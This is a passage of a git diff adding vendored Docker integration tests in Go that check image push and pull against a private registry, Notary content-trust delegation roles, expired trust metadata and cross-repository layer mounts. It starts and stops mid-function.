we retrieve from targets role + pullCmd := exec.Command(dockerBinary, "-D", "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "retrieving target for targets role") + + // Now we'll create the releases role, and try pushing and pulling + s.notaryCreateDelegation(c, repoName, "targets/releases", s.not.keys[0].Public) + s.notaryImportKey(c, repoName, "targets/releases", s.not.keys[0].Private) + s.notaryPublish(c, repoName) + + // try a pull, check that we can still pull because we can still read the + // old tag in the targets role + pullCmd = exec.Command(dockerBinary, "-D", "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "retrieving target for targets role") + + // try a pull -a, check that it succeeds because we can still pull from the + // targets role + pullCmd = exec.Command(dockerBinary, "-D", "pull", "-a", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + + // Push, should sign with targets/releases + dockerCmd(c, "tag", "busybox", targetName) + pushCmd = exec.Command(dockerBinary, "push", targetName) + s.trustedCmd(pushCmd) + out, _, err = runCommandWithOutput(pushCmd) + s.assertTargetInRoles(c, repoName, "latest", "targets", "targets/releases") + + // Try pull, check we retrieve from targets/releases role + pullCmd = exec.Command(dockerBinary, "-D", "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(out, checker.Contains, "retrieving target for targets/releases role") + + // Create another delegation that we'll sign with + s.notaryCreateDelegation(c, repoName, "targets/other", s.not.keys[1].Public) + s.notaryImportKey(c, repoName, "targets/other", s.not.keys[1].Private) + 
s.notaryPublish(c, repoName) + + dockerCmd(c, "tag", "busybox", targetName) + pushCmd = exec.Command(dockerBinary, "push", targetName) + s.trustedCmd(pushCmd) + out, _, err = runCommandWithOutput(pushCmd) + s.assertTargetInRoles(c, repoName, "latest", "targets", "targets/releases", "targets/other") + + // Try pull, check we retrieve from targets/releases role + pullCmd = exec.Command(dockerBinary, "-D", "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(out, checker.Contains, "retrieving target for targets/releases role") +} + +func (s *DockerTrustSuite) TestTrustedPullIgnoresOtherDelegationRoles(c *check.C) { + testRequires(c, NotaryHosting) + repoName := fmt.Sprintf("%v/dockerclipullotherdelegation/trusted", privateRegistryURL) + targetName := fmt.Sprintf("%s:latest", repoName) + + // We'll create a repo first with a non-release delegation role, so that when we + // push we'll sign it into the delegation role + s.notaryInitRepo(c, repoName) + s.notaryCreateDelegation(c, repoName, "targets/other", s.not.keys[0].Public) + s.notaryImportKey(c, repoName, "targets/other", s.not.keys[0].Private) + s.notaryPublish(c, repoName) + + // Push should write to the delegation role, not targets + dockerCmd(c, "tag", "busybox", targetName) + pushCmd := exec.Command(dockerBinary, "push", targetName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + s.assertTargetInRoles(c, repoName, "latest", "targets/other") + s.assertTargetNotInRoles(c, repoName, "latest", "targets") + + // Try pull - we should fail, since pull will only pull from the targets/releases + // role or the targets role + pullCmd := exec.Command(dockerBinary, "-D", "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "No trust data for") + + // try a pull -a: we should fail since 
pull will only pull from the targets/releases + // role or the targets role + pullCmd = exec.Command(dockerBinary, "-D", "pull", "-a", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "No trusted tags for") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go new file mode 100644 index 0000000000..f750c12674 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go @@ -0,0 +1,715 @@ +package main + +import ( + "archive/tar" + "fmt" + "io/ioutil" + "net/http" + "net/http/httptest" + "os" + "os/exec" + "path/filepath" + "strings" + "sync" + "time" + + "github.com/docker/distribution/reference" + "github.com/docker/docker/cliconfig" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// Pushing an image to a private registry. 
+func testPushBusyboxImage(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + // tag the image to upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + // push the image to the registry + dockerCmd(c, "push", repoName) +} + +func (s *DockerRegistrySuite) TestPushBusyboxImage(c *check.C) { + testPushBusyboxImage(c) +} + +func (s *DockerSchema1RegistrySuite) TestPushBusyboxImage(c *check.C) { + testPushBusyboxImage(c) +} + +// pushing an image without a prefix should throw an error +func (s *DockerSuite) TestPushUnprefixedRepo(c *check.C) { + out, _, err := dockerCmdWithError("push", "busybox") + c.Assert(err, check.NotNil, check.Commentf("pushing an unprefixed repo didn't result in a non-zero exit status: %s", out)) +} + +func testPushUntagged(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + expected := "An image does not exist locally with the tag" + + out, _, err := dockerCmdWithError("push", repoName) + c.Assert(err, check.NotNil, check.Commentf("pushing the image to the private registry should have failed: output %q", out)) + c.Assert(out, checker.Contains, expected, check.Commentf("pushing the image failed")) +} + +func (s *DockerRegistrySuite) TestPushUntagged(c *check.C) { + testPushUntagged(c) +} + +func (s *DockerSchema1RegistrySuite) TestPushUntagged(c *check.C) { + testPushUntagged(c) +} + +func testPushBadTag(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/busybox:latest", privateRegistryURL) + expected := "does not exist" + + out, _, err := dockerCmdWithError("push", repoName) + c.Assert(err, check.NotNil, check.Commentf("pushing the image to the private registry should have failed: output %q", out)) + c.Assert(out, checker.Contains, expected, check.Commentf("pushing the image failed")) +} + +func (s *DockerRegistrySuite) TestPushBadTag(c *check.C) { + testPushBadTag(c) +} + +func (s *DockerSchema1RegistrySuite) TestPushBadTag(c *check.C) { + 
testPushBadTag(c) +} + +func testPushMultipleTags(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + repoTag1 := fmt.Sprintf("%v/dockercli/busybox:t1", privateRegistryURL) + repoTag2 := fmt.Sprintf("%v/dockercli/busybox:t2", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoTag1) + + dockerCmd(c, "tag", "busybox", repoTag2) + + dockerCmd(c, "push", repoName) + + // Ensure layer list is equivalent for repoTag1 and repoTag2 + out1, _ := dockerCmd(c, "pull", repoTag1) + + imageAlreadyExists := ": Image already exists" + var out1Lines []string + for _, outputLine := range strings.Split(out1, "\n") { + if strings.Contains(outputLine, imageAlreadyExists) { + out1Lines = append(out1Lines, outputLine) + } + } + + out2, _ := dockerCmd(c, "pull", repoTag2) + + var out2Lines []string + for _, outputLine := range strings.Split(out2, "\n") { + if strings.Contains(outputLine, imageAlreadyExists) { + out1Lines = append(out1Lines, outputLine) + } + } + c.Assert(out2Lines, checker.HasLen, len(out1Lines)) + + for i := range out1Lines { + c.Assert(out1Lines[i], checker.Equals, out2Lines[i]) + } +} + +func (s *DockerRegistrySuite) TestPushMultipleTags(c *check.C) { + testPushMultipleTags(c) +} + +func (s *DockerSchema1RegistrySuite) TestPushMultipleTags(c *check.C) { + testPushMultipleTags(c) +} + +func testPushEmptyLayer(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/emptylayer", privateRegistryURL) + emptyTarball, err := ioutil.TempFile("", "empty_tarball") + c.Assert(err, check.IsNil, check.Commentf("Unable to create test file")) + + tw := tar.NewWriter(emptyTarball) + err = tw.Close() + c.Assert(err, check.IsNil, check.Commentf("Error creating empty tarball")) + + freader, err := os.Open(emptyTarball.Name()) + c.Assert(err, check.IsNil, check.Commentf("Could not open test tarball")) + defer freader.Close() + + importCmd := exec.Command(dockerBinary, "import", "-", repoName) + 
importCmd.Stdin = freader + out, _, err := runCommandWithOutput(importCmd) + c.Assert(err, check.IsNil, check.Commentf("import failed: %q", out)) + + // Now verify we can push it + out, _, err = dockerCmdWithError("push", repoName) + c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out)) +} + +func (s *DockerRegistrySuite) TestPushEmptyLayer(c *check.C) { + testPushEmptyLayer(c) +} + +func (s *DockerSchema1RegistrySuite) TestPushEmptyLayer(c *check.C) { + testPushEmptyLayer(c) +} + +// testConcurrentPush pushes multiple tags to the same repo +// concurrently. +func testConcurrentPush(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + + repos := []string{} + for _, tag := range []string{"push1", "push2", "push3"} { + repo := fmt.Sprintf("%v:%v", repoName, tag) + _, err := buildImage(repo, fmt.Sprintf(` + FROM busybox + ENTRYPOINT ["/bin/echo"] + ENV FOO foo + ENV BAR bar + CMD echo %s +`, repo), true) + c.Assert(err, checker.IsNil) + repos = append(repos, repo) + } + + // Push tags, in parallel + results := make(chan error) + + for _, repo := range repos { + go func(repo string) { + _, _, err := runCommandWithOutput(exec.Command(dockerBinary, "push", repo)) + results <- err + }(repo) + } + + for range repos { + err := <-results + c.Assert(err, checker.IsNil, check.Commentf("concurrent push failed with error: %v", err)) + } + + // Clear local images store. + args := append([]string{"rmi"}, repos...) + dockerCmd(c, args...) 
+ + // Re-pull and run individual tags, to make sure pushes succeeded + for _, repo := range repos { + dockerCmd(c, "pull", repo) + dockerCmd(c, "inspect", repo) + out, _ := dockerCmd(c, "run", "--rm", repo) + c.Assert(strings.TrimSpace(out), checker.Equals, "/bin/sh -c echo "+repo) + } +} + +func (s *DockerRegistrySuite) TestConcurrentPush(c *check.C) { + testConcurrentPush(c) +} + +func (s *DockerSchema1RegistrySuite) TestConcurrentPush(c *check.C) { + testConcurrentPush(c) +} + +func (s *DockerRegistrySuite) TestCrossRepositoryLayerPush(c *check.C) { + sourceRepoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + // tag the image to upload it to the private registry + dockerCmd(c, "tag", "busybox", sourceRepoName) + // push the image to the registry + out1, _, err := dockerCmdWithError("push", sourceRepoName) + c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out1)) + // ensure that none of the layers were mounted from another repository during push + c.Assert(strings.Contains(out1, "Mounted from"), check.Equals, false) + + digest1 := reference.DigestRegexp.FindString(out1) + c.Assert(len(digest1), checker.GreaterThan, 0, check.Commentf("no digest found for pushed manifest")) + + destRepoName := fmt.Sprintf("%v/dockercli/crossrepopush", privateRegistryURL) + // retag the image to upload the same layers to another repo in the same registry + dockerCmd(c, "tag", "busybox", destRepoName) + // push the image to the registry + out2, _, err := dockerCmdWithError("push", destRepoName) + c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out2)) + // ensure that layers were mounted from the first repo during push + c.Assert(strings.Contains(out2, "Mounted from dockercli/busybox"), check.Equals, true) + + digest2 := reference.DigestRegexp.FindString(out2) + c.Assert(len(digest2), checker.GreaterThan, 0, check.Commentf("no digest found for pushed 
manifest")) + c.Assert(digest1, check.Equals, digest2) + + // ensure that pushing again produces the same digest + out3, _, err := dockerCmdWithError("push", destRepoName) + c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out2)) + + digest3 := reference.DigestRegexp.FindString(out3) + c.Assert(len(digest2), checker.GreaterThan, 0, check.Commentf("no digest found for pushed manifest")) + c.Assert(digest3, check.Equals, digest2) + + // ensure that we can pull and run the cross-repo-pushed repository + dockerCmd(c, "rmi", destRepoName) + dockerCmd(c, "pull", destRepoName) + out4, _ := dockerCmd(c, "run", destRepoName, "echo", "-n", "hello world") + c.Assert(out4, check.Equals, "hello world") +} + +func (s *DockerSchema1RegistrySuite) TestCrossRepositoryLayerPushNotSupported(c *check.C) { + sourceRepoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + // tag the image to upload it to the private registry + dockerCmd(c, "tag", "busybox", sourceRepoName) + // push the image to the registry + out1, _, err := dockerCmdWithError("push", sourceRepoName) + c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out1)) + // ensure that none of the layers were mounted from another repository during push + c.Assert(strings.Contains(out1, "Mounted from"), check.Equals, false) + + digest1 := reference.DigestRegexp.FindString(out1) + c.Assert(len(digest1), checker.GreaterThan, 0, check.Commentf("no digest found for pushed manifest")) + + destRepoName := fmt.Sprintf("%v/dockercli/crossrepopush", privateRegistryURL) + // retag the image to upload the same layers to another repo in the same registry + dockerCmd(c, "tag", "busybox", destRepoName) + // push the image to the registry + out2, _, err := dockerCmdWithError("push", destRepoName) + c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out2)) + // schema1 registry 
should not support cross-repo layer mounts, so ensure that this does not happen + c.Assert(strings.Contains(out2, "Mounted from"), check.Equals, false) + + digest2 := reference.DigestRegexp.FindString(out2) + c.Assert(len(digest2), checker.GreaterThan, 0, check.Commentf("no digest found for pushed manifest")) + c.Assert(digest1, check.Not(check.Equals), digest2) + + // ensure that we can pull and run the second pushed repository + dockerCmd(c, "rmi", destRepoName) + dockerCmd(c, "pull", destRepoName) + out3, _ := dockerCmd(c, "run", destRepoName, "echo", "-n", "hello world") + c.Assert(out3, check.Equals, "hello world") +} + +func (s *DockerTrustSuite) TestTrustedPush(c *check.C) { + repoName := fmt.Sprintf("%v/dockerclitrusted/pushtest:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("Error running trusted push: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push")) + + // Try pull after push + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out)) + + // Assert that we rotated the snapshot key to the server by checking our local keystore + contents, err := ioutil.ReadDir(filepath.Join(cliconfig.ConfigDir(), "trust/private/tuf_keys", privateRegistryURL, "dockerclitrusted/pushtest")) + c.Assert(err, check.IsNil, check.Commentf("Unable to read local tuf key files")) + // Check that we only have 1 key (targets key) + c.Assert(contents, checker.HasLen, 1) +} + +func (s *DockerTrustSuite) 
TestTrustedPushWithEnvPasswords(c *check.C) { + repoName := fmt.Sprintf("%v/dockerclienv/trusted:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmdWithPassphrases(pushCmd, "12345678", "12345678") + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("Error running trusted push: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push")) + + // Try pull after push + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out)) +} + +func (s *DockerTrustSuite) TestTrustedPushWithFailingServer(c *check.C) { + repoName := fmt.Sprintf("%v/dockerclitrusted/failingserver:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + pushCmd := exec.Command(dockerBinary, "push", repoName) + // Using a name that doesn't resolve to an address makes this test faster + s.trustedCmdWithServer(pushCmd, "https://server.invalid:81/") + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.NotNil, check.Commentf("Missing error while running trusted push w/ no server")) + c.Assert(out, checker.Contains, "error contacting notary server", check.Commentf("Missing expected output on trusted push")) +} + +func (s *DockerTrustSuite) TestTrustedPushWithoutServerAndUntrusted(c *check.C) { + repoName := fmt.Sprintf("%v/dockerclitrusted/trustedandnot:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + pushCmd := exec.Command(dockerBinary, "push", 
"--disable-content-trust", repoName) + // Using a name that doesn't resolve to an address makes this test faster + s.trustedCmdWithServer(pushCmd, "https://server.invalid") + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("trusted push with no server and --disable-content-trust failed: %s\n%s", err, out)) + c.Assert(out, check.Not(checker.Contains), "Error establishing connection to notary repository", check.Commentf("Missing expected output on trusted push with --disable-content-trust:")) +} + +func (s *DockerTrustSuite) TestTrustedPushWithExistingTag(c *check.C) { + repoName := fmt.Sprintf("%v/dockerclitag/trusted:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + dockerCmd(c, "push", repoName) + + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) + + // Try pull after push + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out)) +} + +func (s *DockerTrustSuite) TestTrustedPushWithExistingSignedTag(c *check.C) { + repoName := fmt.Sprintf("%v/dockerclipushpush/trusted:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + // Do a trusted push + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, 
out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) + + // Do another trusted push + pushCmd = exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err = runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) + + dockerCmd(c, "rmi", repoName) + + // Try pull to ensure the double push did not break our ability to pull + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.IsNil, check.Commentf("Error running trusted pull: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Status: Downloaded", check.Commentf("Missing expected output on trusted pull with --disable-content-trust")) + +} + +func (s *DockerTrustSuite) TestTrustedPushWithIncorrectPassphraseForNonRoot(c *check.C) { + repoName := fmt.Sprintf("%v/dockercliincorretpwd/trusted:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + // Push with default passphrases + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push:\n%s", out)) + + // Push with wrong passphrases + pushCmd = exec.Command(dockerBinary, "push", repoName) + s.trustedCmdWithPassphrases(pushCmd, "12345678", "87654321") + out, _, err = runCommandWithOutput(pushCmd) + c.Assert(err, check.NotNil, check.Commentf("Error missing from trusted push with short targets 
passphrase: \n%s", out)) + c.Assert(out, checker.Contains, "could not find necessary signing keys", check.Commentf("Missing expected output on trusted push with short targets/snapsnot passphrase")) +} + +func (s *DockerTrustSuite) TestTrustedPushWithExpiredSnapshot(c *check.C) { + c.Skip("Currently changes system time, causing instability") + repoName := fmt.Sprintf("%v/dockercliexpiredsnapshot/trusted:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + // Push with default passphrases + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push")) + + // Snapshots last for three years. This should be expired + fourYearsLater := time.Now().Add(time.Hour * 24 * 365 * 4) + + runAtDifferentDate(fourYearsLater, func() { + // Push with wrong passphrases + pushCmd = exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err = runCommandWithOutput(pushCmd) + c.Assert(err, check.NotNil, check.Commentf("Error missing from trusted push with expired snapshot: \n%s", out)) + c.Assert(out, checker.Contains, "repository out-of-date", check.Commentf("Missing expected output on trusted push with expired snapshot")) + }) +} + +func (s *DockerTrustSuite) TestTrustedPushWithExpiredTimestamp(c *check.C) { + c.Skip("Currently changes system time, causing instability") + repoName := fmt.Sprintf("%v/dockercliexpiredtimestamppush/trusted:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + // Push with default passphrases + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := 
runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push")) + + // The timestamps expire in two weeks. Lets check three + threeWeeksLater := time.Now().Add(time.Hour * 24 * 21) + + // Should succeed because the server transparently re-signs one + runAtDifferentDate(threeWeeksLater, func() { + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("Error running trusted push: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with expired timestamp")) + }) +} + +func (s *DockerTrustSuite) TestTrustedPushWithReleasesDelegationOnly(c *check.C) { + testRequires(c, NotaryHosting) + repoName := fmt.Sprintf("%v/dockerclireleasedelegationinitfirst/trusted", privateRegistryURL) + targetName := fmt.Sprintf("%s:latest", repoName) + s.notaryInitRepo(c, repoName) + s.notaryCreateDelegation(c, repoName, "targets/releases", s.not.keys[0].Public) + s.notaryPublish(c, repoName) + + s.notaryImportKey(c, repoName, "targets/releases", s.not.keys[0].Private) + + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", targetName) + + pushCmd := exec.Command(dockerBinary, "push", targetName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) + // check to make sure that the target has been added to targets/releases and not targets + s.assertTargetInRoles(c, repoName, "latest", "targets/releases") + 
s.assertTargetNotInRoles(c, repoName, "latest", "targets") + + // Try pull after push + os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust")) + + pullCmd := exec.Command(dockerBinary, "pull", targetName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out)) +} + +func (s *DockerTrustSuite) TestTrustedPushSignsAllFirstLevelRolesWeHaveKeysFor(c *check.C) { + testRequires(c, NotaryHosting) + repoName := fmt.Sprintf("%v/dockerclimanyroles/trusted", privateRegistryURL) + targetName := fmt.Sprintf("%s:latest", repoName) + s.notaryInitRepo(c, repoName) + s.notaryCreateDelegation(c, repoName, "targets/role1", s.not.keys[0].Public) + s.notaryCreateDelegation(c, repoName, "targets/role2", s.not.keys[1].Public) + s.notaryCreateDelegation(c, repoName, "targets/role3", s.not.keys[2].Public) + + // import everything except the third key + s.notaryImportKey(c, repoName, "targets/role1", s.not.keys[0].Private) + s.notaryImportKey(c, repoName, "targets/role2", s.not.keys[1].Private) + + s.notaryCreateDelegation(c, repoName, "targets/role1/subrole", s.not.keys[3].Public) + s.notaryImportKey(c, repoName, "targets/role1/subrole", s.not.keys[3].Private) + + s.notaryPublish(c, repoName) + + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", targetName) + + pushCmd := exec.Command(dockerBinary, "push", targetName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) + + // check to make sure that the target has been added to targets/role1 and targets/role2, and + // not targets (because there are delegations) or targets/role3 (due to 
missing key) or + // targets/role1/subrole (due to it being a second level delegation) + s.assertTargetInRoles(c, repoName, "latest", "targets/role1", "targets/role2") + s.assertTargetNotInRoles(c, repoName, "latest", "targets") + + // Try pull after push + os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust")) + + // pull should fail because none of these are the releases role + pullCmd := exec.Command(dockerBinary, "pull", targetName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.NotNil, check.Commentf(out)) +} + +func (s *DockerTrustSuite) TestTrustedPushSignsForRolesWithKeysAndValidPaths(c *check.C) { + repoName := fmt.Sprintf("%v/dockerclirolesbykeysandpaths/trusted", privateRegistryURL) + targetName := fmt.Sprintf("%s:latest", repoName) + s.notaryInitRepo(c, repoName) + s.notaryCreateDelegation(c, repoName, "targets/role1", s.not.keys[0].Public, "l", "z") + s.notaryCreateDelegation(c, repoName, "targets/role2", s.not.keys[1].Public, "x", "y") + s.notaryCreateDelegation(c, repoName, "targets/role3", s.not.keys[2].Public, "latest") + s.notaryCreateDelegation(c, repoName, "targets/role4", s.not.keys[3].Public, "latest") + + // import everything except the third key + s.notaryImportKey(c, repoName, "targets/role1", s.not.keys[0].Private) + s.notaryImportKey(c, repoName, "targets/role2", s.not.keys[1].Private) + s.notaryImportKey(c, repoName, "targets/role4", s.not.keys[3].Private) + + s.notaryPublish(c, repoName) + + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", targetName) + + pushCmd := exec.Command(dockerBinary, "push", targetName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) + + // check to make sure that the 
target has been added to targets/role1 and targets/role4, and + // not targets (because there are delegations) or targets/role2 (due to path restrictions) or + // targets/role3 (due to missing key) + s.assertTargetInRoles(c, repoName, "latest", "targets/role1", "targets/role4") + s.assertTargetNotInRoles(c, repoName, "latest", "targets") + + // Try pull after push + os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust")) + + // pull should fail because none of these are the releases role + pullCmd := exec.Command(dockerBinary, "pull", targetName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.NotNil, check.Commentf(out)) +} + +func (s *DockerTrustSuite) TestTrustedPushDoesntSignTargetsIfDelegationsExist(c *check.C) { + testRequires(c, NotaryHosting) + repoName := fmt.Sprintf("%v/dockerclireleasedelegationnotsignable/trusted", privateRegistryURL) + targetName := fmt.Sprintf("%s:latest", repoName) + s.notaryInitRepo(c, repoName) + s.notaryCreateDelegation(c, repoName, "targets/role1", s.not.keys[0].Public) + s.notaryPublish(c, repoName) + + // do not import any delegations key + + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", targetName) + + pushCmd := exec.Command(dockerBinary, "push", targetName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.NotNil, check.Commentf("trusted push succeeded but should have failed:\n%s", out)) + c.Assert(out, checker.Contains, "no valid signing keys", + check.Commentf("Missing expected output on trusted push without keys")) + + s.assertTargetNotInRoles(c, repoName, "latest", "targets", "targets/role1") +} + +func (s *DockerRegistryAuthHtpasswdSuite) TestPushNoCredentialsNoRetry(c *check.C) { + repoName := fmt.Sprintf("%s/busybox", privateRegistryURL) + dockerCmd(c, "tag", "busybox", repoName) + out, _, err := dockerCmdWithError("push", repoName) + c.Assert(err, check.NotNil, check.Commentf(out)) + 
